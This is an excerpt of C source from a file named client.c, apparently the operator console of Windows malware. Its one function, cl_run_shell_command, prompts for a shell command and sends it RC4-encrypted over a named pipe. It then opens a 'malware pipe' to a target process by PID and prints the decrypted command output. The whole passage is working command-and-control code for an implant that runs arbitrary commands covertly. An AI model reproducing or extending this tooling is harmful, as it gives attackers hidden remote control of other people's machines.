in client.c [656:694]
void cl_run_shell_command(HANDLE pipe, const char* target, uint32_t pid)
{
assert(INVALID_HANDLE_VALUE != pipe);
assert(target);
assert(pid);
wchar_t shell_command[MAX_SIZE / 2] = { 0 };
HANDLE secondary_pipe = INVALID_HANDLE_VALUE;
packet_t* packet = NULL;
packet_t* result = NULL;
wchar_t* output = NULL;
h_get_wide_user_string(L"Enter shell command to execute: ", shell_command, MAX_SIZE / 2);
comm_send_command(pipe, RUN_SHELL_COMMAND, (uint8_t*)shell_command,
(uint32_t)((wcslen(shell_command) + 1) * sizeof(wchar_t)), RC4_KEY,
RC4_KEY_LENGTH);
secondary_pipe = cl_open_malware_pipe_0(target, pid);
packet = comm_receive_packet(secondary_pipe);
output = (wchar_t*)comm_receive_decrypt_data(
secondary_pipe, packet->_1.buffer_size, RC4_KEY, RC4_KEY_LENGTH);
wprintf(L"%.*ls\n", packet->_1.buffer_size / 2, output);
result = comm_receive_packet(pipe);
cl_print_packet(result);
if (packet)
free(packet);
if (result)
free(result);
if (output)
free(output);
if (INVALID_HANDLE_VALUE != secondary_pipe)
CloseHandle(secondary_pipe);
}